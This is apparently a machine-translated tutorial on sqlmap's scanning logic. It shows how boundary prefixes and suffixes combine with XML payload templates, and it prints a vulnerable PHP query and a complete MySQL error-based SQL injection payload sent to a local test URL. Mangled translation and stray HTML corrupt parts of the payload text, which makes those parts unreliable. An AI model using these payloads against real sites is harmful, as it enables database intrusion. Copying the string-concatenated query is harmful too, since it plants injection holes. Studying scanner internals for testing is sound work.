Sqlmap's Past Life (PART1)

Http://www.freebuf.com/sectool/77948.html

First, preface

When it comes to SQL injection, the first time you'll think of Artifact Sqlmap,sqlmap is a SQL injection open source tool for detection and utilization. So what is the logic of SQLMAP scanning SQL in the end, then explore the next Sqlmap scanning logic, by understanding the Sqlmap scanning logic to build a own SQL Scanning tool.

Ii. SQL Scan Rules

To understand the scanning rules of Sqlmap, that is, payload, so exactly payload where to come, is based on what logic generated, then you must first understand a few files, sqlmap scan rule files in the \xml folder, where Boundaries.xml and payloads folder is Sqlmap scanning rules, \xml\payloads in the 6 files, the inside of 6 files are stored in different injection method of payload.
Then you must know two formats, one is boundary file, one is payloads.

Example:

<boundary> <level>1</level>     <clause>1</clause>     <where>1,2 </where>    <ptype>1</ptype>    < Prefix> ' </prefix>    <suffix> and  ' [randstr] ' = ' [randstr]</suffix ></BOUNDARY>         

1. Clause and where property

The effect of these two elements is to limit the scope used by boundary, which can be understood as if and only if the value of the where node of a boundary element contains a child node of the test element, the value of the clause node contains the child nodes of the test element, The boundary can be matched with the current test to further generate payload.

2. prefix and Suffix properties

To understand the role of these two properties, first use a piece of code to explain.

functionGetattachtablebypid($pid){$tableid=Db::Result_first("Select TableID from".Db::Table(' Forum_attachment '). " where pid= ' $pid '  limit 1" );    return  forum_ Attachment_ '  $tableid  >= 0  &&  $tableid   < 10 ?  intval ( $tableid )   :  ' unused ' );                /span>               

Through the code we can know that the PID is involved in the concatenation of SQL statements, then if we input the PID is ' and ' test ' = ' test, then the final stitching up the SQL statement should be:

Select TableID from ". Db::table (' forum_attachment '). " WHERE pid=' and ' test ' = ' test ' LIMIT 1     

So if we enter the ' and ' test ' = ' test, then the final concatenation of the SQL statement is also legal. Then we can put the test payload in the middle of prefix and suffix, so that the final SQL legal, so that the injection test, so by understanding that the role of prefix and suffix is to truncate the SQL statement, so that the final payload legal.
At this point the role of boundary file has been explained, followed by payload explanation.

<test><title>MySQL &gt;= 5.0 and Error-based-where, have, ORDER by or GROUP by clause</title><stype>2</stype><level>1</level><risk>1</risk><clause>The</clause><where>1</where><vector>and (select [Randnum] FROM (select COUNT (*), CONCAT (' [Delimiter_start] ', ([QUERY]), ' [Delimiter_stop] ', Floor (RAND (0) * * )) x from INFORMATION_SCHEMA. Character_sets GROUP by X) a)</vector><request><!--these work as good as ELT (), but is Longer<payload>and (select [Randnum] FROM (select COUNT (*), CONCAT (' [DELI Miter_start] ', (SELECT (case if [randnum]=[randnum] then 1 ELSE 0 END)), ' [Delimiter_stop] ', Floor (RAND (0) *)) x from Information_schema. Character_sets GROUP by X) a) </payload><payload>and (select [Randnum] FROM (select COUNT (*), CONCAT (' [ Delimiter_start] ', (SELECT (Make_set ([randnum]=[randnum],1)), ' [Delimiter_stop] ', Floor (RAND (0) *)) x from Information_schema. Character_sets GROUP by X) a) </payload>--><payload>and (select [Randnum] FROM (select COUNT (*), CONCAT (' [Delimiter_start] ', (SELECT (ELT ([randnum]=[randnum],1))), ' [ Delimiter_stop] ', Floor (RAND (0) *)) x from INFORMATION_SCHEMA. Character_sets GROUP by X) a)</payload></request> <response>         <grep>[delimiter_start] (? p&lt;result&gt;. *?) [Delimiter_stop] </grep>    </response>< Span class= "PLN" >    <details>         <dbms>mysql</dbms >        <dbms_version>< Span class= "PLN" >&gt;= 5.0</dbms_version>     </details></TEST>     

1. Title Property

The Title property is the caption of the current test payload, and the current method of injection and the type of database being tested can be understood by the title.

2. Stype Properties

This attribute marks the current type of injection manipulation, 1 is a Boolean type blind, and 2 is an error injection.

3. Level Property

This property is every test has, he is the role is to limit in the SQL test in which depth, in short, when you use SQLMAP for SQL injection test, you need to specify the level of scanning, the default is 1, the maximum is 5, when level skyscraper is, The more tests you perform, the more than 1000 test methods are estimated to be executed if you specify LEVEL5 for injection testing.

4. Clause and where property

The clause in test and the Where property are the same as the clause in boundary and the Where property function.

5. Payload Properties

This property is both the SQL statement that will be tested and the key to the Sqlmap scan logic, where [randnum],[delimiter_start],[delimiter_stop] represents random numbers and characters, respectively. When the Sqlmap scan, the corresponding random number is replaced, and then with the boundary prefix and suffix splicing together, eventually become the test payload.

6. Details Property

Its child nodes will generally have two, its DBMS subsection represents the current payload applicable database type, the current example of the value of MySQL, it means that its payload applicable database is MySQL, its dbms_version sub-section represents the applicable database version.

7. Response Properties

The sub-nodes under this attribute mark the payload test method of the current test.

grep: Error Injection comparison: Boolean type busy injection time: Delay injection char: Federated query Injection

The Checksqlinjection function in Sqlmap is to use this attribute as the basis of judgment to enter different processing branches. And the value in the response attribute is the basis of its SQL injection, as in the current example, the value in grep is [Delimiter_start] (?). p<result>. *?) [Delimiter_stop],sqlmap] replaces [Delimiter_start] with [delimiter_stop] with the corresponding replacement value in payload, and then uses the resulting matching of the returned page information. If there is a SQL injection vulnerability that is present in the judgment.

It is important to note that the strings in the payload are processed according to the database type that the current payload applies to, and the code that is processed is in the syntax.py script in the corresponding database folder under \plugins\dbms.

So the final payload is based on the combination of the values of the Payload child node of test and the prefix (prefix) and suffix (suffix) child nodes of the boundary, namely: the final payload = URL parameter + boundary.prefix+ Test.payload+boundary.suffix

Third, examples

Next, the error injection to explain the use of payload and boundary in practice.

The value of the where node in the boundary element in the example above is 1, 2, the value of the where node with the test element (1), and the value of the clause node in the boundary element is 1, which contains the value of the where node of the test element (1), so The boundary and test elements to match. The value of the payload of the test element is:

and(SELECT[Randnum]From(SELECT COUNT(*),Concat(' [Delimiter_start] ',(select  (case when  ([ Span class= "PLN" >randnum]=[randnum]) 1 else 0end "[Delimiter_stop] ' floor (rand (0 2x from information_ Schema. Tables group by xa)     

We have previously described how the final payload is a format, so finally replace it with [Randnum], [Delimiter_start], [Delimiter_stop], and then escape.

The resulting payload is similar to the following:

[Randnum] = 2214[delimiter_start] = ~ ~ (It is 0x7e21 after escaping) [Delimiter_stop] =!~ (0x217e after escaping) Payload: ' and (select 2214 from (select COUNT (*), CONCAT (0x7e21, (select) (22 14=2214) then 1 ELSE 0 END), 0x217e,floor (RAND (0) *)) x from Information_schema.tables GROUP by X) a) and ' pujm ' = ' pujm

If the http://127.0.0.1/search-result.php?keyword=&ad_id=3 exists, the following error will be reported when executing:

Duplicate entry ' ~!1!~1 ' for key ' Group_key '

According to the previous explanation, the most finally tested URLs are as follows:

Http://127.0.0.1/search-result.php?keyword=&ad_id= ' and (select 2214 from (select COUNT (*), CONCAT (0x7e21, (select (ELT (2214=2214,1))), 0x217e,floor (RAND (0)) x from INFORMATION_SCHEMA. Character_sets GROUP by X) a) and ' ymrm ' = ' YMRM

The following page information is returned:

Finally, match the current page according to the normal in grep.

<grep>[Delimiter_start] (? p&lt;result&gt;. *?) [Delimiter_stop] </grep> 

And the use of regular: ~! (? P<result>.*?)! ~ to match duplicate entry ' ~!1!~1 ' for key ' Group_key ' result is 1, according to the matching results can be drawn to the current page does exist SQL injection.

Summarize

Through the scanning logic of the sqlmap, we can understand the general method and implementation of SQL injection, familiar with Sqlmap configuration file, can be modified according to the actual situation payload and boundary. By adding payload and boundary to enhance SQLMAP scanning rules, you can also use their scanning rules to create your own SQL Scanning tool.

Sqlmap's Past Life (PART1)